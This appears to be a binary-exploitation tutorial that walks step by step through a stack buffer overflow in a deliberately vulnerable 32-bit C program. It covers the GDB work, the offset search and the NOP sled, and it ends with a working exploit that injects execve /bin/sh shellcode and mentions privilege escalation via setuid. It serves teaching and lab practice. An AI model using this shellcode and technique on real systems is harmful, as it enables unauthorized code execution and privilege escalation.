Let's go over a simple buffer overflow on a Linux x86 system. I will be using GDB along with PEDA as my debugger. In this tutorial I will show how we can inject shellcode into an application's memory and execute it. If you need a VM already set up, I created one here. I recommend that you have some basic knowledge of:

* Python
* x86 Assembly
* C programming
* Linux

Download PEDA

Target application and other information.

[+] Name: ezbof
[+] Gcc version: gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1)
[+] Compiled with gcc: gcc -fno-stack-protector -z execstack -no-pie ezbof.c -o ezbof
[+] System Kernel Information: Linux 4.9.0-6-686-pae #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02) GNU/Linux

Source code for ezbof

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void pb(char *buf);

int main(int argc, char **argv)
{
	if (argc < 2)
	{
		printf("%s <string>\n", argv[0]);
		exit(1);
	}
	pb(argv[1]);
	return 0;
}

void pb(char *buf)
{
	char buffer[32];
	strcpy(buffer, buf); /* no length check: this is the vulnerable call */
	printf("[+] Buffer: %s\n", buffer);
}

Before we begin, make sure to disable ASLR. To do this, open a terminal and run:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
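To confirm the setting took effect, the value can be read back. Below is a minimal Python 3 sketch; the helper names `describe_aslr` and `current_aslr` are made up for this example, and the meanings of 0, 1 and 2 follow the kernel's documentation for this sysctl.

```python
# Sketch: read back the ASLR setting (helper names are illustrative).
ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

def describe_aslr(raw):
    """Map the sysctl value to a human-readable description."""
    meanings = {
        "0": "disabled",
        "1": "partial (stack, mmap base and vDSO randomized)",
        "2": "full (as 1, plus the heap)",
    }
    return meanings.get(raw.strip(), "unknown value")

def current_aslr(path=ASLR_PATH):
    """Return the description for this machine, or None if the file is unavailable."""
    try:
        with open(path) as handle:
            return describe_aslr(handle.read())
    except OSError:
        return None

print(current_aslr())
```

Keep in mind that a value written through /proc only lasts until the next reboot, so it is worth checking again after restarting the VM.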

Alright, let's begin by loading our binary into GDB and taking a look at the disassembly. You can do this by running:

gdb -q ezbof
gdb-peda$ disas main


On the left we have the addresses of our instructions and on the right we have the instructions themselves. Notice the call instruction at 0x080484ba. This is the call to the function pb(), so let's disassemble it.

gdb-peda$ disas pb


If we examine the instructions we can see a call to strcpy() at 0x080484ed. This is our vulnerable call. strcpy() copies from the start of the source buffer up to and including the first null byte, and it never checks the size of the destination. That means we can pass in as big a buffer as we want and all of it will be copied, which allows us to overflow the target buffer (the buffer being written to by the strcpy() call).

Now let's begin looking for the offset. The offset tells us how many bytes of padding we need before the address we want to jump to. Most people at this point will break out pattern_create and pattern_search, but I want to show you how to do it manually to build a better understanding.

Let's start by creating buffers with Python. I will be using the Python 2.7 sys.stdout.write() method. The reason for using Python 2.7 is that in Python 3 sys.stdout.write() takes text and encodes it on output (typically as UTF-8), so any character above 0x7f comes out as more than one byte, which makes accurate control over the EIP (Extended Instruction Pointer) register very difficult. I am also using sys.stdout.write() because it does not add a newline like print does, which gives us full control over the buffer we send to stdout. Alright, let's begin.
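The encoding problem is easy to reproduce. The sketch below is Python 3 and only illustrates the behaviour; writing to `sys.stdout.buffer` is one way around it if Python 2.7 is not available, and the helper name `emit_raw` is made up for this example.

```python
import sys

# Encoding text as UTF-8 turns a character above 0x7f into two bytes.
as_text = "\xbf".encode("utf-8")
print(as_text)                       # b'\xc2\xbf'

# A bytes literal keeps every value exactly as written.
as_bytes = b"\xbf"
print(len(as_text), len(as_bytes))   # 2 1

def emit_raw(payload):
    """Write bytes to stdout without encoding and without a trailing newline."""
    sys.stdout.buffer.write(payload)
    sys.stdout.buffer.flush()
```

With that in mind, a Python 3 equivalent of the one-liners in this tutorial would be something like: gdb-peda$ r $(python3 -c 'import sys;sys.stdout.buffer.write(b"A"*100)')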

Create a payload to start with; let's use 100 bytes. In GDB you start a program with r (short for run). Treat r as if it were the name of the program you are running and put the arguments after it, like so:

gdb-peda$ r $(python -c 'import sys;sys.stdout.write("A"*100)')

This will run ezbof with 100 A's as the first argument. The ASCII code for A is 0x41, so we will be looking for 0x41 on our stack. The program should have crashed. If it did not, double-check that you compiled the binary correctly and typed the Python argument correctly.


We have crashed the program by overflowing into the EIP (Extended Instruction Pointer) register. Side note: when I say 'overflowing into EIP', that is technically not correct. What is really happening is that our buffer writes past its end and overwrites the saved return address on the stack. This causes the 'ret' instruction at the end of the function to POP part of my overflowing buffer from the stack into the EIP register.

Now we know we can gain control of execution, so let's find the offset. Because the binary is 32-bit, addresses are 4 bytes long, so we add 4 B's to the end of our payload; these four bytes are the ones that will fill EIP. Once we see the binary crash at 0x42424242, we know that the number of A's we used is the offset to the saved return address. To find your offset, keep decreasing the number of A's until you see the B's fill EIP. I am just going to skip ahead to the correct offset.
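For comparison with the manual search, here is a rough Python 3 sketch of what pattern tools do: build a string in which every 4-byte window is unique, crash the program with it, then look up the value that landed in EIP. The function names are hypothetical and this is not PEDA's implementation; the crash value is simulated rather than taken from a real run.

```python
import string
import struct

def make_pattern(length):
    """Build an 'Aa0Aa1Aa2...' style pattern of the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length].encode("ascii")
    return "".join(chunks)[:length].encode("ascii")

def find_offset(eip_value, pattern):
    """Return the pattern offset of the 4 bytes that ended up in EIP, or -1."""
    needle = struct.pack("<I", eip_value)   # EIP holds the bytes little-endian
    return pattern.find(needle)

pattern = make_pattern(100)
# Simulate a crash in which the bytes at offset 44 were loaded into EIP.
crashed_eip = struct.unpack("<I", pattern[44:48])[0]
print(find_offset(crashed_eip, pattern))    # 44
```

The manual method gives the same answer; the pattern just gets there in a single run.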


As you can see here, the program tried to jump to the address 0x42424242, or BBBB in ASCII. If you haven't already figured it out, our offset is 44: there are 44 bytes before our 4 B's, and the 4 B's are the bytes that end up in EIP. This is where we will place our return address.

Our return address needs to point at our shellcode, which can be a tad tricky because the stack addresses will be different once we run our exploit outside of GDB. GDB puts extra things on the stack, and when you run the binary outside GDB those things are no longer there, so everything shifts and your return address has to change with it.

Let's begin creating a payload and directing code execution. To start, let's create the base of our payload. Our payload structure will look like this:

python -c 'import sys;sys.stdout.write(("A"*44)+("B"*4)+("C"*55))'

So our payload has 44 A's to reach the offset, then the value that ends up in EIP (the address we want execution to jump to), which for now is our B's. After that come our C's, which mark the spot we want to point execution at. There are 55 of them to make sure we have at least 55 bytes of space after our B's to place NOPs and shellcode.
More on NOPs
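The same layout can be written out piece by piece, which makes the sizes easier to check. This is a Python 3 sketch using bytes literals; the variable names are mine.

```python
OFFSET = 44                      # bytes before the saved return address

padding = b"A" * OFFSET          # fills the buffer and everything up to the return address
ret_slot = b"B" * 4              # placeholder for the 4-byte return address
landing = b"C" * 55              # room for 32 NOPs plus 23 bytes of shellcode later on

payload = padding + ret_slot + landing

print(len(payload))                    # 103
print(payload[OFFSET:OFFSET + 4])      # b'BBBB'
```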


As you can see in the stack section of the PEDA output, our C's are filling up the stack. You will also notice the blue addresses on the left of the stack section; these are our stack addresses. We want to point execution at one of those once we add our shellcode. Side note: we are going to point at the top of the stack to keep this simple.

The address we need to point to inside GDB is different from the address outside GDB because of the environment variables GDB adds to the stack. We will use NOPs to make this easier on us. NOPs are No-Operation instructions; on the x86 architecture the byte 0x90 is a NOP. A NOP does nothing except let the instruction pointer move on to the next instruction. We can use a run of them to create a big landing pad for our instruction pointer: once it is pointing anywhere in our NOPs, it simply steps through them one after another until it reaches our shellcode, which is then executed. This will make things easier once we move out of GDB.

Let's begin working on getting our EIP register to point to our NOPs.
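A toy model may help here. The Python 3 sketch below is not an emulator; it only mimics the one behaviour that matters, namely that each 0x90 byte moves execution forward by one byte. The names and the stand-in shellcode bytes are illustrative.

```python
NOP = 0x90

def slide(memory, entry):
    """Advance from `entry` over NOP bytes; return the index where real code starts."""
    position = entry
    while position < len(memory) and memory[position] == NOP:
        position += 1
    return position

sled = bytes([NOP]) * 32
fake_shellcode = b"\xcc" * 23        # stand-in bytes, not real shellcode
memory = sled + fake_shellcode

# Any entry point inside the sled ends up at the same place.
print({slide(memory, entry) for entry in range(32)})   # {32}
```

This is why the return address only has to fall somewhere inside the sled rather than on one exact byte.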

Here I have added NOPs (0x90) to our payload.

gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("B"*4)+("\x90"*32)+("C"*23))')


As you can see, our NOPs are now on the stack as well. Now we need to point EIP at our NOPs on the stack. In my case I will be pointing EIP to 0xbffff880; your stack address may be different.

gdb-peda$ disas pb
gdb-peda$ b * 0x0804850c
gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("C"*23))')

First I disassemble the pb() function to find the address of our ret instruction.


In my case it is 0x0804850c; it may be different for you. Next I set a breakpoint at the address of the ret instruction. This will allow us to pause execution and examine the stack at that instruction.


After setting the breakpoint I run the program with my payload pointing at my NOPs.


The 0000 entry in the stack section is the top of the stack. This is where the ESP (Extended Stack Pointer) register points. Once the ret instruction executes, it will jump to the address stored at the top of the stack. I have put my address in place of my B's, so when the ret instruction is executed it will jump to 0xbffff880, which is where my NOP instructions are located on the stack. A ret instruction is effectively a POP EIP instruction, so if it helps, think of it that way.

Also, if you are like 'what the nuggets, Pinky, why did you put your address in backwards!?', the reason is that Intel x86 processors are little-endian: they store the least significant byte of a value first, at the lowest address. More on this below.
More on Endianness

To help make this clearer I'll give some examples.

Normal: 0xdeadbeef <=> Little-Endian: 0xefbeadde
Normal: 0xbffff880 <=> Little-Endian: 0x80f8ffbf
Normal: 0x12345678 <=> Little-Endian: 0x78563412

In my python payload I did it like this:

python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("C"*23))'

Notice the "\x80\xf8\xff\xbf"; this is the address I want to jump to in little-endian form.
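Rather than reversing the bytes by hand, the standard `struct` module can do the conversion. A short Python 3 sketch follows; the helper name `p32` is just a convenience I picked for this example.

```python
import struct

def p32(address):
    """Pack a 32-bit address into 4 little-endian bytes."""
    return struct.pack("<I", address)

print(p32(0xbffff880))   # b'\x80\xf8\xff\xbf'
print(p32(0xdeadbeef))   # b'\xef\xbe\xad\xde'
print(p32(0x12345678))   # b'xV4\x12'
```

The last line looks odd only because Python prints 0x78, 0x56 and 0x34 as the ASCII characters x, V and 4. struct.pack() behaves the same way in Python 2.7, where its result can be passed straight to sys.stdout.write().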

Now let's add some shellcode to execute! I will be using this shellcode:


You can find this shellcode below. It is 23 bytes long, and we will be putting it after our NOPs, where the 23 C's were.
Get Shellcode

gdb-peda$ b * 0x0804850c
gdb-peda$ r $(python -c 'import sys;sys.stdout.write(("A"*44)+("\x80\xf8\xff\xbf")+("\x90"*32)+("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"))')
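For reference, here are the same 23 bytes split up by instruction. The mnemonics in the comments are my own reading of the bytes, not output from a disassembler. The Python 3 sketch also checks properties the exploit depends on: the length, the absence of null bytes (strcpy() stops at the first one), and the absence of spaces, tabs and newlines (the shell would split the unquoted $(...) argument on them).

```python
shellcode = (
    b"\x31\xc0"              # xor eax, eax      ; eax = 0
    b"\x50"                  # push eax          ; null terminator for the string
    b"\x68\x2f\x2f\x73\x68"  # push 0x68732f2f   ; "//sh"
    b"\x68\x2f\x62\x69\x6e"  # push 0x6e69622f   ; "/bin"
    b"\x89\xe3"              # mov ebx, esp      ; ebx -> "/bin//sh"
    b"\x50"                  # push eax          ; argv[1] = NULL
    b"\x53"                  # push ebx          ; argv[0] = "/bin//sh"
    b"\x89\xe1"              # mov ecx, esp      ; ecx -> argv
    b"\xb0\x0b"              # mov al, 0x0b      ; syscall 11 = execve
    b"\xcd\x80"              # int 0x80          ; hand control to the kernel
)

has_whitespace = any(byte in shellcode for byte in b" \t\n")

print(len(shellcode))          # 23
print(b"\x00" in shellcode)    # False
print(has_whitespace)          # False
```

The return address and padding need to pass the same checks, since they travel in the same argument.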


At my breakpoint you can see that ESP points to the stack slot holding the address of my NOPs, which will guide the instruction pointer to my shellcode. Let's continue execution with 'c'.

gdb-peda$ c


As you can see, /bin/dash has been executed. On many Linux machines today /bin/sh is just a link to /bin/dash, which is why /bin/dash ran when our shellcode executed /bin/sh. Alright, now that we have code execution, let's move out of GDB!

gdb-peda$ q

To find the difference between the address inside GDB and the address outside GDB, just keep adding 0x10 (16 in decimal) to your return address until you get code execution. You will eventually land on our NOPs, which will guide EIP to our shellcode. My difference happened to be 0x50 (80 in decimal), so instead of 0xbffff880 my return address is 0xbffff8d0 outside of GDB. Here is the end result.

./ezbof $(python -c 'import sys;sys.stdout.write(("A"*44)+("\xd0\xf8\xff\xbf")+("\x90"*32)+("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"))')
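Stepping in 0x10 increments is a safe choice for a 32-byte sled, because a step smaller than the sled can never jump over it. The Python 3 sketch below simulates the search. `real_sled_start` is a hypothetical value chosen for illustration (outside GDB you would not know it in advance), and the sketch assumes the addresses move upward outside GDB, as they did for me.

```python
def first_hit(gdb_address, real_sled_start, sled_len=32, step=0x10, max_tries=64):
    """Return the first guessed address that lands inside the sled, or None."""
    for attempt in range(max_tries):
        guess = gdb_address + attempt * step
        if real_sled_start <= guess < real_sled_start + sled_len:
            return guess
    return None

gdb_address = 0xbffff880          # address that worked inside GDB
real_sled_start = 0xbffff8c8      # hypothetical: where the sled sits outside GDB

hit = first_hit(gdb_address, real_sled_start)
print(hex(hit), hex(hit - gdb_address))   # 0xbffff8d0 0x50
```

In practice each guess means rerunning ./ezbof with the new return address and seeing whether you get a shell.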


If, for example, this binary were owned by root and had the setuid bit set, you could escalate privileges with this overflow.

If you made it to the end, thank you for reading. I hope you learned something from this. My goal was to cover this topic in more detail than what I have found on it in the past, and I included things I wish I could have found when I was learning binary exploitation. If you enjoyed it, feel free to share it. If you have feedback, let me know on Twitter!

Twitter: @Pink_P4nther